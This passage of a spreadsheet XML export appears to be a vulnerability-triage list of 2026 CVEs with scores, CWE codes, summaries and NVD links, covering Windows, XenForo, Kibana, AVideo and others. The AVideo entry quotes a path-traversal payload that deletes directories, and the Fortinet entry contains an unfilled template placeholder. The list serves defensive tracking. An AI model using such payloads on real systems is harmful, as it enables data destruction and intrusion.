          <t>XenForo before 2.3.13 contains a multi-factor authentication bypass vulnerability in the passkey TFA provider that allows an authenticated attacker to complete login as another user by submitting their own registered passkey credential during the WebAuthn assertion step. The passkey verification path performs a global credential lookup without validating that the matched credential belongs to the user whose login is pending, enabling an attacker who knows a target account's password to sign the challenge with their own passkey and bypass multi-factor authentication on both public forum and ACP login paths.</t>
        </is>
      </c>
      <c r="S665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73313</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75021</t>
        </is>
      </c>
      <c r="D666" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E666" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F666" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr"/>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr"/>
      <c r="Q666" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="R666" s="5" t="inlineStr">
        <is>
          <t>fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and because the Inspector protocol allows arbitrary code evaluation, a remote party that reaches it can achieve remote code execution on the developer's machine. This affects fastify-cli from 1.5.0 up to 8.0.1. Users should upgrade to fastify-cli 8.0.1, which honors the configured Inspector bind address.</t>
        </is>
      </c>
      <c r="S666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77505</t>
        </is>
      </c>
      <c r="D667" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E667" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F667" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr"/>
      <c r="Q667" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R667" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77505</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="D668" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E668" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F668" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K668" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr"/>
      <c r="Q668" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R668" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78449</t>
        </is>
      </c>
      <c r="D669" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E669" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F669" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr"/>
      <c r="Q669" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R669" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="D670" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E670" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F670" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K670" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr"/>
      <c r="Q670" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R670" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78583</t>
        </is>
      </c>
      <c r="D671" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E671" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F671" s="5" t="inlineStr">
        <is>
          <t>security@elastic.co</t>
        </is>
      </c>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K671" s="5" t="inlineStr">
        <is>
          <t>elastic:kibana</t>
        </is>
      </c>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr"/>
      <c r="Q671" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R671"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S671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78583</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78626</t>
        </is>
      </c>
      <c r="D672" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E672" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F672" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr"/>
      <c r="Q672" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R672"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S672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79746</t>
        </is>
      </c>
      <c r="D673" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E673" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F673" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr"/>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr"/>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr"/>
      <c r="Q673" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R673" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.31, when a bearer key with accessType: 'servers' (or 'custom') is used against a group route, isBearerKeyAllowedForRequest grants access to the entire group as long as any single server in that group appears in the key's allowedServers list — not only when every server the key is scoped to matches, and critically, without ever re-checking allowedServers again once the group-level connection is authorized. A key explicitly scoped to one specific server therefore also grants full access to every other server that happens to share a group with it, including servers the key was never authorized for. This issue has been patched in version 1.0.31.</t>
        </is>
      </c>
      <c r="S673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79746</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="D674" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E674" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K674" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr"/>
      <c r="Q674" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R674"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S674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82302</t>
        </is>
      </c>
      <c r="D675" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E675" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F675" s="5" t="inlineStr">
        <is>
          <t>security@elastic.co</t>
        </is>
      </c>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr"/>
      <c r="Q675" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R675" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization (CWE-863) in Kibana can lead to unauthorized configuration modification via Exploiting Incorrectly Configured Access Control Security Levels (CAPEC-180).</t>
        </is>
      </c>
      <c r="S675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82302</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83527</t>
        </is>
      </c>
      <c r="D676" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E676" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F676" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr"/>
      <c r="Q676" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R676" s="5" t="inlineStr">
        <is>
          <t>An Authentication Bypass vulnerability in Sentry before R10.8.2, R10.7.3 and R10.6.4 allows a remote unauthenticated attacker to gain administrative level access.</t>
        </is>
      </c>
      <c r="S676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83527</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="D677" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E677" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F677" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K677" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L677" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr"/>
      <c r="Q677" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R677" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84393</t>
        </is>
      </c>
      <c r="D678" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E678" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F678" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr"/>
      <c r="Q678" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="R678" s="5" t="inlineStr">
        <is>
          <t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="S678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85160</t>
        </is>
      </c>
      <c r="D679" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E679" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr"/>
      <c r="L679" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr"/>
      <c r="Q679" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R679" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a cross-site request forgery and path traversal vulnerability in stopLive.php that allows attackers to delete directories by exploiting missing token validation and unsanitized key parameter concatenation. Attackers can craft an image tag with a traversal payload like key=../../videos to trigger recursive deletion of the videos directory when an admin visits a malicious page.</t>
        </is>
      </c>
      <c r="S679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85160</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86720</t>
        </is>
      </c>
      <c r="D680" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E680" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr"/>
      <c r="L680" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr"/>
      <c r="Q680" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R680" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate ownership of live_restreams_id in resendRestreamer.json.php, allowing authenticated users with canStream to access other users' restream destinations. Attackers can broadcast their live stream to victim-configured restream destinations by supplying arbitrary live_restreams_id values, hijacking YouTube, Facebook, or Twitch streams using victim stream keys.</t>
        </is>
      </c>
      <c r="S680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86720</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86723</t>
        </is>
      </c>
      <c r="D681" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E681" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr"/>
      <c r="L681" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr"/>
      <c r="Q681" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R681" s="5" t="inlineStr">
        <is>
          <t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability in LoginControl::verifyChallenge() that uses loose comparison (==) instead of strict comparison (===) against unset session values. Attackers with only a password can submit an empty request to verifyChallenge.json.php to bypass PGP two-factor authentication and gain full authenticated access.</t>
        </is>
      </c>
      <c r="S681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86723</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28662</t>
        </is>
      </c>
      <c r="D682" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E682" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F682" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L682" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr"/>
      <c r="Q682" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R682"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S682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28662</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55277</t>
        </is>
      </c>
      <c r="D683" s="5" t="n">
        <v>8</v>
      </c>
